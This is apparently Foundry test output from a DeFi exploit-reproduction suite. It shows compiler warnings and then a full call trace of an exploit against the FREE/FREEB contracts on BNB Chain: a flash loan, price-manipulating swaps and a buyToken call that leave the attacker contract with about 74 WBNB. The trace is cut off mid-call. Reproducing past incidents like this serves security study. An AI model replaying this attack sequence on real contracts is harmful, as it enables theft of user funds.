Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.25s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-01/Freedom_exp.sol:38:5:
   |
38 |     IERC20 WBNB = IERC20(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:2436:1:
     |
2436 | interface WBNB {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-01/Freedom_exp.sol:58:31:
   |
58 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                               ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-01/Freedom_exp.sol:58:47:
   |
58 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                               ^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-01/Freedom_exp.sol:58:67:
   |
58 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                   ^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-01/Freedom_exp.sol:58:88:
   |
58 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                                        ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 889.10ms (4.25ms CPU time)

Ran 1 test for src/test/2024-01/Freedom_exp.sol:ContractTest
[PASS] testExploit() (gas: 506789)
Logs:
  Attacker WBNB balance before attack:: 0
  Attacker WBNB balance before attack:: 74148897789587975743

Traces:
  [9419] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 35123710 [3.512e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(FREE: [0x8A43Eb772416f934DE3DF8F9Af627359632CB53F], "FREE")
    │   └─ ← [Return]
    ├─ [0] VM::label(FREEB: [0xAE3ADa8787245977832c6DaB2d4474D3943527Ab], "FREEB")
    │   └─ ← [Return]
    └─ ← [Stop]

  [638752] ContractTest::testExploit()
    ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_uint(key: "Attacker WBNB balance before attack:", val: 0)
    ├─ [24420] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x0072fde0c25a54a99a0517f551c3cabc4c49d9ef3648fd789a3f57d0243cdb90: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [590817] 0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476::flashLoan(500000000000000000000 [5e20], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   ├─ [588118] 0x85351262f7474Ebe23FfAcD633cf20A491F1325D::flashLoan(500000000000000000000 [5e20], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00) [delegatecall]
    │   │   ├─ [27962] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 500000000000000000000 [5e20])
    │   │   │   ├─ emit Transfer(from: 0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 500000000000000000000 [5e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000001b1ae4d6e2ef500000
    │   │   │   │   @ 0x5c79f3f522b9104472f925e5aa96e2626794acdb6a7d9f181cfee783d3583c15: 0x00000000000000000000000000000000000000000000001da4d5ec7d8e4705e6 → 0x00000000000000000000000000000000000000000000000289f1159a9ef705e6
    │   │   │   └─ ← [Return] true
    │   │   ├─ [533730] ContractTest::DPPFlashLoanCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 500000000000000000000 [5e20], 0, 0x00)
    │   │   │   ├─ [24690] FREE::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x44bf1039324fcbfda472196706fa68525cb38db0f3d91f5ca7d489ff92357e45: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 500000000000000000000 [5e20]
    │   │   │   ├─ [127621] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(500000000000000000000 [5e20], 0, [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0x8A43Eb772416f934DE3DF8F9Af627359632CB53F], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1704893888 [1.704e9])
    │   │   │   │   ├─ [8225] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x24721eC014e19eA0e3c965AeE2b138cf4b72e941, 500000000000000000000 [5e20])
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x24721eC014e19eA0e3c965AeE2b138cf4b72e941, value: 500000000000000000000 [5e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000001b1ae4d6e2ef500000 → 0
    │   │   │   │   │   │   @ 0xfd0767b14cedca3950384bc39e8b427ebbcc73b39cbc4b0eb9db02d1ff6a6884: 0x00000000000000000000000000000000000000000000001017eda0c1086be1c6 → 0x00000000000000000000000000000000000000000000002b32d277a3f7bbe1c6
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [4782] FREE::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 1
    │   │   │   │   ├─ [2893] 0x24721eC014e19eA0e3c965AeE2b138cf4b72e941::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 17351165995629032583784 [1.735e22], 296872116162636014022 [2.968e20], 1704893876 [1.704e9]
    │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x24721eC014e19eA0e3c965AeE2b138cf4b72e941) [staticcall]
    │   │   │   │   │   └─ ← [Return] 796872116162636014022 [7.968e20]
    │   │   │   │   ├─ [100823] 0x24721eC014e19eA0e3c965AeE2b138cf4b72e941::swap(10876889750197700647166 [1.087e22], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   │   ├─ [66305] FREE::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 10876889750197700647166 [1.087e22])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x24721eC014e19eA0e3c965AeE2b138cf4b72e941, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 10876889750197700647166 [1.087e22])
    │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: FREE: [0x8A43Eb772416f934DE3DF8F9Af627359632CB53F], value: 543844487509885032358 [5.438e20])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x7ed2648421f4d3c63014aa8c265065958e4fa9c9f2ad6db5963d1e4d7b0dad1c: 0x0000000000000000000000000000000000000000000000000e15d3a5c6c85fff → 0x00000000000000000000000000000000000000000000001d897193a04fd7f7a5
    │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x00000000000000000000000000000000000000000000023027cf3f982c284158
    │   │   │   │   │   │   │   @ 0x13457d945bc4e7d3fddd5dfccecebab890f3766a0957ce7235be1e207c3f2f65: 0x0000000000000000000000000000000000000000000003ac9bccc69b717d3268 → 0x00000000000000000000000000000000000000000000015ef8a1c708bc45596a
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [672] FREE::balanceOf(0x24721eC014e19eA0e3c965AeE2b138cf4b72e941) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 6474276245431331936618 [6.474e21]
    │   │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x24721eC014e19eA0e3c965AeE2b138cf4b72e941) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 796872116162636014022 [7.968e20]
    │   │   │   │   │   ├─ emit Sync(reserve0: 6474276245431331936618 [6.474e21], reserve1: 796872116162636014022 [7.968e20])
    │   │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 0, amount1In: 500000000000000000000 [5e20], amount0Out: 10876889750197700647166 [1.087e22], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 8: 0x659e9db400000000001017eda0c1086be1c60000000003ac9bccc69b717d3268 → 0x659e9dc000000000002b32d277a3f7bbe1c600000000015ef8a1c708bc45596a
    │   │   │   │   │   │   @ 9: 0x000000000000000000000000000000000bad63636155e548ebd2357276b60150 → 0x000000000000000000000000000000000bad97f2f1d4a342209458c8c64ead0c
    │   │   │   │   │   │   @ 10: 0x0000000000000000000000000000037086729ef8eabb85db7a84ddfa6ac8e8f7 → 0x00000000000000000000000000000370892ffaede6c3d197335a51dc19e52ff3
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [672] FREE::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 10333045262687815614808 [1.033e22]
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [101271] FREEB::buyToken(136938233021986089342 [1.369e20], 5000000000000000000 [5e18])
    │   │   │   │   ├─ [94106] 0x8afEbC3244769a21504D73E94A56d56FE3698c25::buyToken(136938233021986089342 [1.369e20], 5000000000000000000 [5e18]) [delegatecall]
    │   │   │   │   │   ├─ [275] 0x10ED43C718714eb63d5aA57B78B54704E256024E::WETH() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c
    │   │   │   │   │   ├─ [80057] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactETHForTokens{value: 136938233021986089342}(5000000000000000000 [5e18], [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0x8A43Eb772416f934DE3DF8F9Af627359632CB53F], FREEB: [0xAE3ADa8787245977832c6DaB2d4474D3943527Ab], 1704893888 [1.704e9])
    │   │   │   │   │   │   ├─ [893] 0x24721eC014e19eA0e3c965AeE2b138cf4b72e941::getReserves() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 6474276245431331936618 [6.474e21], 796872116162636014022 [7.968e20], 1704893888 [1.704e9]
    │   │   │   │   │   │   ├─ [23974] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::deposit{value: 136938233021986089342}()
    │   │   │   │   │   │   │   ├─ emit Deposit(dst: 0x10ED43C718714eb63d5aA57B78B54704E256024E, wad: 136938233021986089342 [1.369e20])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0 → 0x0000000000000000000000000000000000000000000000076c6655675525a97e
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ [3262] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x24721eC014e19eA0e3c965AeE2b138cf4b72e941, 136938233021986089342 [1.369e20])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x10ED43C718714eb63d5aA57B78B54704E256024E, to: 0x24721eC014e19eA0e3c965AeE2b138cf4b72e941, value: 136938233021986089342 [1.369e20])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0xfd0767b14cedca3950384bc39e8b427ebbcc73b39cbc4b0eb9db02d1ff6a6884: 0x00000000000000000000000000000000000000000000002b32d277a3f7bbe1c6 → 0x0000000000000000000000000000000000000000000000329f38cd0b4ce18b44
    │   │   │   │   │   │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0x0000000000000000000000000000000000000000000000076c6655675525a97e → 0
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [37013] 0x24721eC014e19eA0e3c965AeE2b138cf4b72e941::swap(947391346955818232687 [9.473e20], 0, FREEB: [0xAE3ADa8787245977832c6DaB2d4474D3943527Ab], 0x)
    │   │   │   │   │   │   │   ├─ [21779] FREE::transfer(FREEB: [0xAE3ADa8787245977832c6DaB2d4474D3943527Ab], 947391346955818232687 [9.473e20])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x24721eC014e19eA0e3c965AeE2b138cf4b72e941, to: FREEB: [0xAE3ADa8787245977832c6DaB2d4474D3943527Ab], value: 947391346955818232687 [9.473e20])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x13457d945bc4e7d3fddd5dfccecebab890f3766a0957ce7235be1e207c3f2f65: 0x00000000000000000000000000000000000000000000015ef8a1c708bc45596a → 0x00000000000000000000000000000000000000000000012b9cef9478e7df6dfb
    │   │   │   │   │   │   │   │   │   @ 0x7965d864e103467542a168632a54c313846a819b32dce33dbc1531427fd5b545: 0x00000000000000000000000000000000000000000000014cb35b8993079004c8 → 0x0000000000000000000000000000000000000000000001800f0dbc22dbf5f037
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ [672] FREE::balanceOf(0x24721eC014e19eA0e3c965AeE2b138cf4b72e941) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 5526884898475513703931 [5.526e21]
    │   │   │   │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x24721eC014e19eA0e3c965AeE2b138cf4b72e941) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 933810349184622103364 [9.338e20]
    │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 5526884898475513703931 [5.526e21], reserve1: 933810349184622103364 [9.338e20])
    │   │   │   │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 0, amount1In: 136938233021986089342 [1.369e20], amount0Out: 947391346955818232687 [9.473e20], amount1Out: 0, to: FREEB: [0xAE3ADa8787245977832c6DaB2d4474D3943527Ab])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 8: 0x659e9dc000000000002b32d277a3f7bbe1c600000000015ef8a1c708bc45596a → 0x659e9dc00000000000329f38cd0b4ce18b4400000000012b9cef9478e7df6dfb
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   └─ ← [Return] [136938233021986089342 [1.369e20], 947391346955818232687 [9.473e20]]
    │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000076c6655675525a97e0000000000000000000000000000000000000000000000335bb2328fd465eb6f
    │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000076c6655675525a97e0000000000000000000000000000000000000000000000335bb2328fd465eb6f
    │   │   │   ├─ [672] FREE::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 10333045262687815614808 [1.033e22]
    │   │   │   ├─ [250408] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(10333045262687815614808 [1.033e22], 0, [0x8A43Eb772416f934DE3DF8F9Af627359632CB53F, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1704893888 [1.704e9])
    │   │   │   │   ├─ [202237] FREE::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x24721eC014e19eA0e3c965AeE2b138cf4b72e941, 10333045262687815614808 [1.033e22])
    │   │   │   │   │   ├─ [672] FREE::balanceOf(FREE: [0x8A43Eb772416f934DE3DF8F9Af627359632CB53F]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 544859437509885032357 [5.448e20]
    │   │   │   │   │   ├─ [2349] FREE::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 100000000000000000000000 [1e23]
    │   │   │   │   │   ├─ [349] FREE::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 100000000000000000000000 [1e23]
    │   │   │   │   │   ├─ [3483] FREE::transfer(FREEB: [0xAE3ADa8787245977832c6DaB2d4474D3943527Ab], 20000000000000000000 [2e19])
    │   │   │   │   │   │   ├─ emit Transfer(from: FREE: [0x8A43Eb772416f934DE3DF8F9Af627359632CB53F], to: FREEB: [0xAE3ADa8787245977832c6DaB2d4474D3943527Ab], value: 20000000000000000000 [2e19])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x7ed2648421f4d3c63014aa8c265065958e4fa9c9f2ad6db5963d1e4d7b0dad1c: 0x00000000000000000000000000000000000000000000001d897193a04fd7f7a5 → 0x00000000000000000000000000000000000000000000001c73e34d973c07f7a5
    │   │   │   │   │   │   │   @ 0x7965d864e103467542a168632a54c313846a819b32dce33dbc1531427fd5b545: 0x0000000000000000000000000000000000000000000001800f0dbc22dbf5f037 → 0x000000000000000000000000000000000000000000000181249c022befc5f037
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [56156] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(160000000000000000000 [1.6e20], 0, [0x8A43Eb772416f934DE3DF8F9Af627359632CB53F, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], 0xE470Cd130c9ce5A8a09C0693472056062De0F980, 1704893888 [1.704e9])
    │   │   │   │   │   │   ├─ [5985] FREE::transferFrom(FREE: [0x8A43Eb772416f934DE3DF8F9Af627359632CB53F], 0x24721eC014e19eA0e3c965AeE2b138cf4b72e941, 160000000000000000000 [1.6e20])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: FREE: [0x8A43Eb772416f934DE3DF8F9Af627359632CB53F], to: 0x24721eC014e19eA0e3c965AeE2b138cf4b72e941, value: 160000000000000000000 [1.6e20])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x7ed2648421f4d3c63014aa8c265065958e4fa9c9f2ad6db5963d1e4d7b0dad1c: 0x00000000000000000000000000000000000000000000001c73e34d973c07f7a5 → 0x000000000000000000000000000000000000000000000013c7711d4e9d87f7a5
    │   │   │   │   │   │   │   │   @ 0x13457d945bc4e7d3fddd5dfccecebab890f3766a0957ce7235be1e207c3f2f65: 0x00000000000000000000000000000000000000000000012b9cef9478e7df6dfb → 0x0000000000000000000000000000000000000000000001344961c4c1865f6dfb
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0xE470Cd130c9ce5A8a09C0693472056062De0F980) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   ├─ [893] 0x24721eC014e19eA0e3c965AeE2b138cf4b72e941::getReserves() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 5526884898475513703931 [5.526e21], 933810349184622103364 [9.338e20], 1704893888 [1.704e9]
    │   │   │   │   │   │   ├─ [672] FREE::balanceOf(0x24721eC014e19eA0e3c965AeE2b138cf4b72e941) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 5686884898475513703931 [5.686e21]
    │   │   │   │   │   │   ├─ [38396] 0x24721eC014e19eA0e3c965AeE2b138cf4b72e941::swap(0, 26208832765883312920 [2.62e19], 0xE470Cd130c9ce5A8a09C0693472056062De0F980, 0x)
    │   │   │   │   │   │   │   ├─ [23162] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0xE470Cd130c9ce5A8a09C0693472056062De0F980, 26208832765883312920 [2.62e19])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x24721eC014e19eA0e3c965AeE2b138cf4b72e941, to: 0xE470Cd130c9ce5A8a09C0693472056062De0F980, value: 26208832765883312920 [2.62e19])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0xa32afc71846fd542772ee29e1e209dc128fea774a9b22186881f9b888b43493b: 0 → 0x0000000000000000000000000000000000000000000000016bb87a8a4c17eb18
    │   │   │   │   │   │   │   │   │   @ 0xfd0767b14cedca3950384bc39e8b427ebbcc73b39cbc4b0eb9db02d1ff6a6884: 0x0000000000000000000000000000000000000000000000329f38cd0b4ce18b44 → 0x0000000000000000000000000000000000000000000000313380528100c9a02c
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ [672] FREE::balanceOf(0x24721eC014e19eA0e3c965AeE2b138cf4b72e941) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 5686884898475513703931 [5.686e21]
    │   │   │   │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x24721eC014e19eA0e3c965AeE2b138cf4b72e941) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 907601516418738790444 [9.076e20]
    │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 5686884898475513703931 [5.686e21], reserve1: 907601516418738790444 [9.076e20])
    │   │   │   │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 160000000000000000000 [1.6e20], amount1In: 0, amount0Out: 0, amount1Out: 26208832765883312920 [2.62e19], to: 0xE470Cd130c9ce5A8a09C0693472056062De0F980)
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 8: 0x659e9dc00000000000329f38cd0b4ce18b4400000000012b9cef9478e7df6dfb → 0x659e9dc00000000000313380528100c9a02c0000000001344961c4c1865f6dfb
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0xE470Cd130c9ce5A8a09C0693472056062De0F980) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 26208832765883312920 [2.62e19]
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0xE470Cd130c9ce5A8a09C0693472056062De0F980) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 26208832765883312920 [2.62e19]
    │   │   │   │   │   ├─ [27325] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transferFrom(0xE470Cd130c9ce5A8a09C0693472056062De0F980, FREE: [0x8A43Eb772416f934DE3DF8F9Af627359632CB53F], 26208832765883312920 [2.62e19])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0xE470Cd130c9ce5A8a09C0693472056062De0F980, to: FREE: [0x8A43Eb772416f934DE3DF8F9Af627359632CB53F], value: 26208832765883312920 [2.62e19])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xfd18ed11c38f34021f9e0be37c0771aee7da9178e3fc88759be5dcc012b10470: 0 → 0x0000000000000000000000000000000000000000000000016bb87a8a4c17eb18
    │   │   │   │   │   │   │   @ 0xa32afc71846fd542772ee29e1e209dc128fea774a9b22186881f9b888b43493b: 0x0000000000000000000000000000000000000000000000016bb87a8a4c17eb18 → 0
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(FREE: [0x8A43Eb772416f934DE3DF8F9Af627359632CB53F]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 26208832765883312920 [2.62e19]
    │   │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(FREE: [0x8A43Eb772416f934DE3DF8F9Af627359632CB53F]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 26208832765883312920 [2.62e19]
    │   │   │   │   │   ├─ [9195] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::withdraw(26208832765883312920 [2.62e19])
    │   │   │   │   │   │   ├─ [55] FREE::fallback{value: 26208832765883312920}()
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ emit Withdrawal(src: FREE: [0x8A43Eb772416f934DE3DF8F9Af627359632CB53F], wad: 26208832765883312920 [2.62e19])
